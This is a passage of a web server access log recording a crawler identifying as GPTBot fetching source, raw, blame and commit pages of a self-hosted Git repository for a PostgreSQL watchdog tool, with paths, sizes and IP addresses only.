"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21224] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83209] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 10829] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10159] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12072] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17181] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18351] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 10848] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 117986] [Gzip 19.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" +[17/Feb/2026:13:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9872] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212038] [Gzip 17.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83168] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 872714] [Gzip 23.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10902] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" +[17/Feb/2026:13:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10127] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" +[17/Feb/2026:13:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16594] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29880] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 10817] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 10823] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 10826] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 10818] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15779] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9865] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10177] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9512] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212002] [Gzip 17.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" +[17/Feb/2026:13:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9866] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 